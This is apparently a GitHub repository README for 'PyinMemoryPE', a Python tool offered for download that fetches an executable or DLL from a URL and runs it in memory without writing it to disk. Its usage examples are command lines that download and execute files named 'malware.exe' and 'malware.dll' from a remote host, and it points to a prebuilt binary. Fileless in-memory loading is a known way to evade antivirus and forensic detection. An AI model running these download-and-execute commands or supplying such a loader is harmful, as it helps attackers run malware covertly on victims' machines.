Skip to content

ELMERIKH/PyinMemoryPE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Greetings

PyinMemoryPE

execute any PE (dll,exe) in memory filelessly

usage

pyMemory.py < url> < TYPe >

build into exe

use pyinstaller or nuitka and build pymemory.py

or use the prebuilt exe in ./output

example

exe : PyexecMemory.exe http://example.com/malware.exe EXE

dll: PyexecMemory.exe http://example.com/malware.dll DLL --Method DLLRegisterServer

#video demo :(by gemini cyber security)

https://youtu.be/51dctDdCiI0?feature=shared

Check for more info and resources

https://github.com/naksyn/PythonMemoryModule

https://www.joachim-bauch.de/tutorials/loading-a-dll-from-memory/